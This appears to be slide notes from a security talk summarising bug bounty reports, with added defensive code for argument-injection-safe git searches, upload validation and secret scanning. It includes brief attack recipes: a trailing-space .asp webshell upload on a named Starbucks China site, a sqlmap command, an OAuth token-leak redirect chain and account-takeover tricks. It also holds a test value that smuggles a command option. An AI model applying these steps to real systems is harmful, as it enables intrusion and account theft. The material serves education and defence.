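def is_safe_ref(ref):
    try:
        validate_ref(ref)
        return True
    except ValueError:
        return False


def build_search_command(repo_dir, term, ref):
    """argv for `git grep`: the pattern is bound with -e so a term starting with
    '-' is data, the ref has been validated so it cannot start with '-', and a
    trailing '--' ends option parsing for any pathspec that follows."""
    return ["git", "-C", repo_dir, "grep", "-n", "-e", term, validate_ref(ref), "--"]


def search_wiki(repo_dir, term, ref):
    """Run the search with shell=False; the list is passed straight to execve()."""
    result = subprocess.run(build_search_command(repo_dir, term, ref),
                            capture_output=True, text=True, check=False)
    return result.stdout.splitlines()


if __name__ == "__main__":
    for candidate in ("main", "feature/wiki-v2.1", "--output=/tmp/file", "main/../other"):
        print(f"{candidate!r}: {'ok' if is_safe_ref(candidate) else 'rejected'}")
```

The same pattern applies to every subprocess you build from request data: bind values with their option (-e term), put positionals after a validated prefix, and terminate option parsing with -- wherever the command supports it.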
118. RCE
Webshell via File Upload on ecjobs.starbucks.com.cn
1. Sign in at the URL (https://ecjobs.starbucks.com.cn) and go to the resume endpoint.
2. Use Burp Suite tools to intercept the avatar upload request.
3. Replace the filename type .jpg with asp, with a space character after it, and modify the content
After that you have uploaded malicious files on the server and can run any OS command on the server you wanted.
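The trailing space in step 3 is the whole trick: a check that looks at the raw name sees an extension that is not ".asp", while the platform that creates the file drops the trailing space and happily serves it as ASP. The code below is an added example (not the site's code) of the server-side checks that close this: trim before deciding the extension, allowlist image extensions only, require the content's leading bytes to match that extension, and never reuse the client's file name. The allowlist is an assumption.

```python
"""Server-side checks for an uploaded avatar: decide the extension only after
trimming the trailing whitespace that some platforms drop when creating the
file, require the bytes to look like an image, and never reuse the client's
file name.  Added example, not the site's code; the allowlist is an assumption."""
import secrets

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def extension_of(filename):
    """'shell.asp ' -> 'asp'.  NUL bytes, trailing spaces and dots are removed
    first, so a name that slips past a naive endswith('.asp') test is still
    judged as .asp."""
    name = filename.replace("\x00", "").strip().rstrip(". ")
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def content_kind(data):
    """Image type implied by the leading bytes, or None."""
    for magic, kind in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def accept_upload(filename, data):
    """Return a server-chosen storage name, or raise ValueError.  The extension
    must be allowed AND agree with the content's magic bytes."""
    ext = extension_of(filename)
    if ext not in ALLOWED_IMAGE_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    expected_kind = "jpg" if ext == "jpeg" else ext
    if content_kind(data) != expected_kind:
        raise ValueError("content does not match the declared image type")
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename, data):
    try:
        accept_upload(filename, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(extension_of("shell.asp "))                          # asp
    print(is_accepted("shell.asp ", b"<html>"))                # False
    print(accept_upload("avatar.jpg", b"\xff\xd8\xff\xe0JFIF"))  # random name ending in .jpg
```

Store the result outside the web root or on a host that never executes server-side code, and serve it back with a fixed image Content-Type; then even a check that is wrong about the bytes cannot turn an upload into a webshell.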
126. Insecure Design
“When requesting a ride, it was possible to intercept the request and forward it with 3 random characters at the end of the paymentProfileUuid parameter.
This would cause the ride to disappear from both the Rider's and Driver's trip history, the Rider would not be charged, and the Driver would not receive payment for the trip.”
132. SQLi
Steps to Reproduce:
1. python sqlmap.py -u https://REPLACE-ME/public/saveCount.cfm?countID=4 --level=3 --risk=3
Impact
An attacker can take control over the database server.
138. Hardcoded Token
“GitHub is a truly awesome service but it is unwise to put any sensitive data in code that is hosted on GitHub and similar services, as I was able to find a github token indexed 7 hours ago by user ██████ - Software Engineer - Snap Inc”
139. Hardcoded Token
“I know it’s not my right to ask, just out of curiosity, what was the impact of the above if it reached bad hands? Doesn’t the google authentication somehow protect the access to this site even with the token leaked?
The web interface needed a valid snap account, but not the API.”
140. Hardcoded Token
Recommendations:
• Don’t hardcode tokens
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded tokens (git-secrets, gitleaks, gitrob, trufflehog)
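Both the Hardcoded Key slides and the Hardcoded Token slides end with the same recommendation: run a scanner before the commit reaches a public repository. To show what those tools do, here is an added example (not git-secrets, gitleaks, gitrob or trufflehog) of a minimal scanner: pattern rules for well-known key formats plus a Shannon-entropy test that keeps placeholders like "xxxxxxxx" from paging anyone. Every value in SAMPLE is constructed; AKIAIOSFODNN7EXAMPLE is the access key id that AWS documentation itself uses as an example.

```python
"""A small pre-commit style scanner for hardcoded credentials: pattern rules
for well-known key formats plus a Shannon-entropy test that separates real
secrets from placeholders.  Added example for the 'run scanning tools'
recommendation on the Hardcoded Key and Hardcoded Token slides; it is not
git-secrets, gitleaks, gitrob or trufflehog, and every value in SAMPLE is
constructed (AKIAIOSFODNN7EXAMPLE is the documented AWS example key)."""
import math
import re

RULES = [
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("generic-api-key", re.compile(
        r"(?i)\b(api[_-]?key|x-api-key|token|secret)\b\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{20,})")),
    ("private-key-block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
]


def shannon_entropy(text):
    """Bits per character; 'xxxx' -> 0.0, 32 distinct characters -> 5.0."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(text, entropy_threshold=3.5):
    """Return (line number, rule, redacted sample) for each hit.  The generic
    rule additionally requires high entropy so 'api_key = "xxxxxxxx..."' in a
    template does not fire."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in RULES:
            m = pattern.search(line)
            if not m:
                continue
            candidate = m.group(m.lastindex) if m.lastindex else m.group(0)
            if rule == "generic-api-key" and shannon_entropy(candidate) < entropy_threshold:
                continue
            findings.append((lineno, rule, candidate[:6] + "..."))
    return findings


SAMPLE = """\
# constructed sample file; nothing below is a real credential
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
api_key = "xxxxxxxxxxxxxxxxxxxxxxxx"
x-api-key: q7Hd92kLmZpVw3xRt8NyB5cJfA1sEo6U
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for lineno, rule, sample in scan_text(SAMPLE):
        print(f"line {lineno}: {rule} ({sample})")
```

Wire it into a pre-commit hook (scan the staged diff, not the working tree) so the key never lands in history; once it has been pushed, rotating the key is the only real fix, because search indexes and forks keep copies regardless of a force-push.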
145. Insecure Design
When a user creates an account using Google or Facebook and does not set an additional password, it is possible to set their password via CSRF.
Since the account is created using a social media account, no existing-password check is needed, and the CSRF check on the endpoint is broken.
An attacker can take over accounts created using Google or Facebook.
151. Insecure Design
Chained Bugs to Leak Victim's Uber FB OAuth Token
1. Prompt OAuth authorization on facebook.com
2. Redirect to https://auth.uber.com/login?next_url=https://login.uber.com/logout from Facebook
3. Redirect to https://login.uber.com/logout from auth.uber.com
4. Redirect to attacker site from Referer header and return the token
When combined, this would have allowed for a full account takeover
157. Account Takeover
“Through the endpoint at /rt/users/passwordless-signup it is possible to change the password of any Uber user, given knowledge of their phone number (or by just enumerating phone numbers until one is found that is registered with Uber - not too hard given the number of Uber users).”
164. Insecure Design
“There is a vulnerability in Vimeo which allows any user to watch a passworded video without the password.
A user can like a passworded video without the password, then the user can watch the video on Couchmode without the password.”
171. Insecure Design
“I found a way to become a verified GitLab team member on Slack. By doing so, I gained access to dozens of channels possibly containing sensitive information.”
181. There is hope …
• Follow security design principles
• Keep knowledge current
• Spend effort throughout SDLC
• Focus on key controls (2fa, input validation)
• Work on prevention, but also detection and response
• Patch
• (try bug bounties - make some extra $)